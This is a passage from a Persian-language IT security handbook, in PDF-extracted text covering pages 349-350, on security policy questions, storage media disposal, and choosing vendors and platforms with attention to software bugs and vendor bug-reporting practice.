‫ﻛﺪﺍﻡ ﺍﺩﺍﺭﺍﺕ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺭﺍ ﺩﺍﺭﻧﺪ؟‬ ‫•‬
‫ﭘﻴﺶ ﺍﺯ ﻧﺼﺐ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ‪ upload‬ﺻﻔﺤﺎﺕ ﻭﺏ‪ ،‬ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ؟‬ ‫•‬
‫ﺑﻪ ﺷﻜﺎﻳﺘﻬﺎ ﻭ ﺩﺭﺧﻮﺍﺳﺘﻬﺎ ﺩﺭ ﻣﻮﺭﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭ ﻣﺤﺘﻮﺍﻫﺎﻱ ﺁﻥ ﭼﮕﻮﻧﻪ ﺑﺎﻳﺪ ﺭﺳﻴﺪﮔﻲ ﻛﺮﺩ؟‬ ‫•‬
‫‪٣٤٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺳﺎﺯﻣﺎﻥ ﭼﮕﻮﻧﻪ ﺑﺎﻳﺪ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭﺍﻛﻨﺶ ﻧﺸﺎﻥ ﺩﻫﺪ؟‬ ‫•‬


‫ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻳﻚ ﺭﺧﺪﺍﺩ‪ ،‬ﭼﻪ ﻛﺴﻲ ﻣﺠﺎﺯ ﺍﺳﺖ ﺑﺎ ﻧﺸﺮﻳﺎﺕ‪ ،‬ﻣﺠﺮﻳﺎﻥ ﻗﺎﻧﻮﻥ‪ ،‬ﻭ ﻳﺎ ﺳﺎﻳﺮ ﻋﻮﺍﻣﻞ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﮔﻔﺘﮕﻮ ﻛﻨﺪ؟‬ ‫•‬
‫ﺧﻮﺩ ﺳﻴﺎﺳﺖ ﺑﺎﻳﺪ ﺩﺭ ﭼﻪ ﺯﻣﺎﻧﻲ ﻭ ﻃﺒﻖ ﭼﻪ ﺭﻭﺍﻟﻲ ﻣﻮﺭﺩ ﺑﺎﺯﺑﻴﻨﻲ ﻗﺮﺍﺭ ﮔﻴﺮﺩ؟‬ ‫•‬

‫ﺍﺳﻨﺎﺩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻜﺘﻮﺏ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺗﻤﺎﻡ ﻛﺴﺎﻧﻲ ﺑﺎﺷﺪ ﻛﻪ ﺑﺎ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻫﺴﺘﻨﺪ‪ .‬ﺗﻮﺟﻪ ﺑﻪ ﺗـﺪﻭﻳﻦ‬
‫ﺳﻴﺎﺳﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺸﻜﻼﺕ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪.‬‬
‫ﻳﻜﻲ ﺍﺯ ﺑﺨﺸﻬﺎﻱ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ ،‬ﺭﻭﺵ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺮﺍﻱ ﻣﻨﻬـﺪﻡ ﻛـﺮﺩﻥ ﺭﺳـﺎﻧﻪﻫـﺎﻱ‬
‫ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺍﺳﺖ‪ .‬ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ‪ ،‬ﻧﻮﺍﺭﻫﺎﻱ ﻗﺪﻳﻤﻲ ﭘﺸﺘﻴﺒﺎﻥ‪ ،‬ﻭ ﺣﺘﻲ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ ﻛـﺎﺭﻱ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺣـﺎﻭﻱ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﻣﺤﺮﻣﺎﻧﻪ ﻭ ﺍﺭﺯﺷﻤﻨﺪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﺍﻗﻼﻡ ﻧﻪﺗﻨﻬﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺩﺭﺣﺎﻝ ﻓﻌﺎﻟﻴﺖ ﻫﺴﺘﻨﺪ ﺑﺎﻳﺪ ﺍﺯ ﺧﺪﺷﻪﺩﺍﺭ ﺷﺪﻥ ﺣﻔﺎﻇـﺖ ﮔﺮﺩﻧـﺪ‪ ،‬ﺑﻠﻜـﻪ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺯ ﺭﺩﻩ ﺧﺎﺭﺝ ﻣﻲﺷﻮﻧﺪ ﻧﻴﺰ ﺑﺎﻳﺪ ﺳﻴﺎﺳﺘﻲ ﻣﺸﺨﺺ ﻭ ﻛﺎﺭﺁ ﺑﺮﺍﻱ ﺍﻧﻬﺪﺍﻡ ﻭ ﻏﻴﺮﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩﻥ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻧﻬﺎ ﻭﺟﻮﺩ‬
‫ﻻ ﻣﻨﻬﺪﻡ ﻛﺮﺩﻥ ﻛﺎﻣﻞ ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ ﺑﺴﻴﺎﺭ ﻣﺸﻜﻞ ﺍﺳﺖ‪.‬‬ ‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬

‫ﺍﻧﺘﺨﺎﺏ ﻓﺮﻭﺷﻨﺪﻩ‬
‫ﺍﻣﺮﻭﺯﻩ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎ ﮔﺰﻳﻨﻪﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺘﻬﺎﻱ ﻧﺼﺐﻛﻨﻨﺪﻩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺍﻃﻼﻋـﺎﺕ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺁﻳـﺎ‬
‫ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﺎﻳﺪ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ Windows‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻳﺎ ‪ ،Unix ،Mac OS‬ﻭ ﻳﺎ ﻳﻚ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﺁﺯﺍﺩ ﺷـﺒﻴﻪ ‪Unix‬؟ ﺁﻳـﺎ ﺍﻳـﻦ‬
‫ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﻳﻚ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﺓ ﺳﺎﺯﮔﺎﺭ ﺑﺎ ‪ Intel‬ﺭﺍ ﺑﻜﺎﺭ ﺑﺒﺮﺩ ﻳﺎ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩﻫﺎﻱ‪ ،Power PC ،SPARC‬ﻭ ﻳﺎ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ؟ ﺁﻳﺎ ﺭﺍﻳﺎﻧﺔ ﻣﻮﺭﺩ‬
‫ﻧﻈﺮ ﺑﺎﻳﺪ ﺑﺎ ﺧﺪﻣﺎﺕ ﭘﺲ ﺍﺯ ﻓﺮﻭﺵ ﺧﺮﻳﺪﺍﺭﻱ ﺷﻮﺩ ﻳﺎ ﺑﺪﻭﻥ ﺁﻥ؟ ﭼﻪ ﺳﻄﺤﻲ ﺍﺯ ﺧﺪﻣﺎﺕ ﭘﺲ ﺍﺯ ﻓﺮﻭﺵ ﺑﺮﺍﻱ ﻛﺎﺭ ﺷﻤﺎ ﻣﻨﺎﺳﺐ ﺍﺳﺖ؟‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﺼﻤﻴﻤﺎﺕ ﺧﺮﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﻋﻮﺍﻣﻠﻲ ﭼﻮﻥ ﻫﺰﻳﻨﺔ ﺳﻴﺴﺘﻢ‪ ،‬ﺍﻋﺘﺒﺎﺭ ﻓﺮﻭﺷﻨﺪﻩ ﻭ ﺗﺠﺮﺑﺔ ﺷﺨﺼﻲ ﻛﻪ ﺧﺮﻳﺪ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ ﺍﺗﺨـﺎﺫ‬
‫ﻣﻲﺷﻮﻧﺪ ﻭ ﺗﻌﺪﺍﺩ ﻛﻤﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺧﺮﻳﺪ ﺧﻮﺩ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘ ﹺﻢ ﻣﻮﺭﺩ ﻧﻈﺮ ﺗﻨﻈﻴﻢ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺑﻌﻀﻲ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻭ ﺑﺮﺧﻲ ﺍﺯ ﺑﺴﺘﺮﻫﺎ ﺫﺍﺗﹰﺎ ﺍﻣﻨﻴﺖ ﺑﻴﺸﺘﺮﻱ ﻧﺴﺒﺖ ﺑﻪ ﻣﺎﺑﻘﻲ ﺩﺍﺭﻧﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻣﺨﺘﻠﻒ‪ ،‬ﺑﺮﺍﻱ ﻛﻴﻔﻴﺖ ﺑﺮﻧﺎﻣـﻪ‬
‫ﻭ ﺍﻣﻨﻴﺖ ﺁﻥ ﺍﺭﺯﺷﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻗﺎﺋﻞ ﻫﺴﺘﻨﺪ؛ ﺍﻣﺎ ﺍﻧﺪﺍﺯﺓ ﺳﺎﺯﻣﺎﻥ ﻣﺸﺘﺮﻱ ﻫﻢ ﺑﺮ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ‬
‫ﺭﻗﺒﺎﻱ ﺳﺮﻣﺎﻳﻪﺩﺍﺭ‪ ،‬ﻳﺎﻓﺘﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻋﻤﻮﻡ ﻣﻨﺘﺸﺮ ﻛﻨﻨﺪ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺗﺎ ﺣﺪﻭﺩﻱ ﺍﻳﻤﻦ ﻫﺴﺘﻨﺪ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺎﺍﻣﻦ ﺷﻮﻧﺪ‪.‬‬
‫ﻳﻜﻲ ﺍﺯ ﺑﺰﺭﮔﺘﺮﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ﻋﻠﻴﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ‪ ،‬ﻭﺟﻮﺩ ﺍﺷﻜﺎﻻﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ؛ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺗﻮﻗﻒ ﻛﺎﺭ ﺳﻴﺴﺘﻢ ﺷﻮﺩ‪ ،‬ﺍﻃﻼﻋﺎﺕ‬
‫ﺭﺍ ﺗﺨﺮﻳﺐ ﻛﻨﺪ‪ ،‬ﻳﺎ ﺍﺯ ﻫﻤﻪ ﺑﺪﺗﺮ‪ ،‬ﺍﻓﺮﺍﺩ ﺧﺎﺭﺟﻲ ﺭﺍ ﻗﺎﺩﺭ ﻛﻨﺪ ﻛﻪ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮ ﻣﺠﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺪ ﻧﻴﺴﺖ ﺑﺪﺍﻧﻴﺪ ﻛﻪ ﺩﺭﺻـﺪ‬
‫ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ‪ ،‬ﺑﺮﺍﻱ ﻋﻤﻠﻴﺎﺕ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺧﻮﺩ ﻫﻤﭽﻨﺎﻥ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺁﺯﻣﺎﻳﺸﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻳﺎ ﺣﺘﻲ ﻧﺴﺨﻪﻫﺎﻱ ﭘﻴـﺸﺘﺮ ﺍﺯ ﺁﻥ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ!‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛـﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺏ‪ ،‬ﺭﻭﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﺑـﺎ ﻳـﻚ ﺭﻳـﺰﭘﺮﺩﺍﺯﻧـﺪﺓ ﺳـﺎﺯﮔﺎﺭ ﺑـﺎ ‪ Intel‬ﻭ ﺑـﺎ ﺳﻴـﺴﺘﻢﻋـﺎﻣﻠﻲ ﺍﺯ ﻧـﺴﻞ‬
‫‪ Windows NT‬ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻣﻬﺎﺟﻤﺎﻥ ﺍﻧﮕﻴﺰﺓ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺩﺭ ﺍﻳﻦ ﭘﻴﻜﺮﺑﻨﺪﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻩﺍﻧﺪ‪ ١٩٦.‬ﺑﻪ ﻫﻤـﻴﻦ‬
‫ﺩﻟﻴﻞ ﺑﺮﺧﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺍﺯ ﭘﻴﻜﺮﺑﻨﺪﻳﻬﺎﻱ ﻏﻴﺮﻣﺮﺳﻮﻡ ‪ -‬ﻣﺜﻞ ‪ Open BSD‬ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ‪- Solaris SPARC‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ ،‬ﺗﻨﻬﺎ ﺑﻪ ﺍﻳﻦ ﻋﻠﺖ ﻛﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺴﻴﺎﺭ ﻛﻤﺘﺮﻱ ﺗﺠﺮﺑﺔ ﻛﺎﺭ ﺑﺎ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﺩﺍﺭﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﺍﻭﻟﻴﻦ ﻧﮕﺮﺍﻧﻲ ﺷﻤﺎ ﺩﺭ‬
‫ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻣﺴﺎﺋﻞ ﻣﺒﺘﻼﺑﻪ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ‪ Macintosh‬ﺑﺎ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ ،OS 8 ،OS 7‬ﻭ ﻳﺎ ‪ OS 9‬ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻳﻦ ﻧﺴﺨﻪﻫﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ ‪ Macintosh‬ﺑـﺎ ﺑﺮﻧﺎﻣـﺔ ﻣﻔـﺴﺮ‬
‫ﺧﻂ ﻓﺮﻣﺎﻥ‪ ١٩٧‬ﺩﺭ ﺑﺎﺯﺍﺭ ﺗﻮﺯﻳﻊ ﻧﺸﺪﻩﺍﻧﺪ‪ ،‬ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻧﻔﻮﺫ ﻛﻨﻨﺪ ﻭ ﺑﻪ ﺍﻧﺘﺨـﺎﺏ ﺧـﻮﺩ ﺑـﻪ‬

‫‪ ۱۹۶‬ﺩﻻﻳﻞ ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺑﺮﺍﻱ ﺗﺒﺪﻳﻞﺷﺪﻥ ﻣﺤﺼﻮﻻﺕ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﻪ ﻳﻚ ﻫﺪﻑ ﺟﺬﺍﺏ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺍﺳﺖ‪ ،‬ﻣﺜﻞ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﻛـﺸﻒﻧـﺸﺪﻩ‪،‬‬
‫ﭘﻴﭽﻴﺪﮔﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺁﻥ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ ﺩﺷﻮﺍﺭ ﺑﺎﺷﺪ‪ ،‬ﻭ ﻧﻴﺰ ﺍﻳﻦ ﻭﺍﻗﻌﻴﺖ ﺳﺎﺩﻩ ﻛﻪ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺧﻮﺷﺸﺎﻥ ﻧﻤﻲﺁﻳﺪ‪.‬‬
‫‪197 Command-Line Interpreter‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٥٠‬‬

‫ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺑﭙﺮﺩﺍﺯﻧﺪ‪ .‬ﺑﻌﻼﻭﻩ ﺍﻳﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺩﻫﻬﺎ ﺳﺮﻭﻳﺲ ﺷﺒﻜﻪﺍﻱ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺑﺘـﻮﺍﻥ ﻫﺮﻳـﻚ ﺍﺯ ﺁﻧﻬـﺎ ﺭﺍ ﻣـﻮﺭﺩ ﺳـﻮﺀ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺑﻄﻮﺭ ﻛﻠﻲ ﻧﻴﺰ ﺷﺮﻛﺖ ‪ Apple‬ﺳﺎﺑﻘﺔ ﺧﻮﺑﻲ ﺩﺭ ﺍﺭﺍﺋﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺩﻗﻴﻖ ﻭ ﺑﺪﻭﻥ ﺍﺷﻜﺎﻝ ﺩﺍﺭﺩ‪.‬‬
‫ﻫﺮﭼﻨﺪ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻲ ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺍﺧﺘـﺼﺎﺻﻲ ﻛـﻪ ﺑـﺮﺍﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻧﻴﺰ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﻩ ﻣﻬﻢ ﻫﺴﺘﻨﺪ‪ .‬ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﺳﺎﺩﻩ ﻛﻪ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﻗﺎﺑﻠﻴـﺖ ﺳﻴـﺴﺘﻢ ﻧﻮﺷـﺘﻪﺷـﺪﻩ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻳﻤﻦ ﺭﺍ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻛﻨﺪ‪.‬‬
‫ﺑﺮﺧﻲ ﺍﺯ ﻣﺮﺍﺣﻠﻲ ﻛﻪ ﺑﺎﻳﺪ ﭘﻴﺶ ﺍﺯ ﻃﺮﺍﺣﻲ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺩﻧﺒﺎﻝ ﺷﻮﻧﺪ ﺑﻪ ﺷﺮﺡ ﺯﻳﺮ ﻫﺴﺘﻨﺪ‪:‬‬
‫ﺗﺤﻘﻴﻖ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﺪﺍﻡ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﻪ ﺗﻮﻟﻴﺪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺪﻭﻥ ﺍﺷﻜﺎﻝ ﻭ ﺧﻮﺏ ﻣـﺴﺘﻨﺪﺳﺎﺯﻱﺷـﺪﻩ ﻣﻌـﺮﻭﻑ ﻫـﺴﺘﻨﺪ‪ .‬ﺑﺒﻴﻨﻴـﺪ‬ ‫•‬
‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﻣﺸﺨﺼﻲ ﻛﻪ ﻓﺮﻭﺷﻨﺪﻩ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺳﻄﺢ ﺑﺎﻻﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻜﺎﺭ ﻣﻲﺑﺮﺩ ‪ -‬ﻣﺜﻞ ﺗﺠﻬﻴﺰﺍﺕ ﻭ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﺗﺤﻠﻴـﻞ‬
‫ﺟﺮﻳﺎﻥ ﺩﺍﺩﻩﻫﺎ‪ ،‬ﻣﻤﻴﺰﻱﻫﺎﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﻳﺎ ﺁﺯﻣﻮﻥ ﻧﻔﻮﺫ ‪ -‬ﻛﺪﺍﻣﻨﺪ‪ .‬ﺍﺯ ﻓﺮﻭﺷﻨﺪﻩ ﺑﺨﻮﺍﻫﻴﺪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎ ﻭ ﺍﻗﺪﺍﻣﺎﺕ ﺧﻮﺩ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻗﺮﺍﺭ ﺩﻫﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﺑﻪ ﺭﻭﺍﻟﻬﺎﻱ ﻗﺒﻠﻲ ﺁﻥ ﻓﺮﻭﺷﻨﺪﻩ ﺑﺮﺍﻱ ﻛﺸﻒ ﻭ ﮔﺰﺍﺭﺵ ﺍﺷـﻜﺎﻻﺕ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﺶ ﺗﻮﺟﻪ ﻛﻨﻴﺪ‪ .‬ﻳﻚ ﻣﻨﺒﻊ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈـﻮﺭ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺩﺭ ﺁﺩﺭﺱ ‪http://www.securityfocus.com‬‬
‫ﭘﻴﺪﺍ ﻛﺮﺩ‪) .‬ﺑﺪﻟﻴﻞ ﺗﻜﺎﻣﻞ ﺭﻭﺷﻬﺎﻱ ﭘﺬﻳﺮﻓﺘﻪﺷﺪﻩ ﺩﺭ ﻛﺸﻒ ﻭ ﮔﺰﺍﺭﺵ ﻧﻘﺎﻳﺺ‪ ،‬ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺷﻮﺩ ﺍﺯ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻗﺒﻞ ﺍﺯ ﺳـﺎﻝ ‪ ۱۹۹۷‬ﻫـﺴﺘﻨﺪ ﺩﺭ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ؛ ﭼﺮﺍﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﭼﻨﺪﺍﻥ ﻗﺎﺑﻞ ﺍﺳﺘﻨﺎﺩ ﻧﺒﺎﺷﻨﺪ‪(.‬‬
‫ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﺴﺒﺖ ﺑﻪ ﮔﺰﺍﺭﺵ ﻣﺸﻜﻼﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﻭ ﻳﺎ ﻛﺎﺭﺁﻳﻲ ﻣﺤﺼﻮﻻﺗـﺸﺎﻥ ﭼﮕﻮﻧـﻪ ﻭﺍﻛـﻨﺶ‬ ‫•‬
‫ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺁﻳﺎ ﻓﺮﻭﺷﻨﺪﺓ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﻪ ﭼﻨﻴﻦ ﮔﺰﺍﺭﺷﺎﺗﻲ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﺪ؟ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺮﺧﻲ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻋﺘﺮﺍﺿـﺎﺕ ﻛـﺎﺭﺑﺮﺍﻥ‬
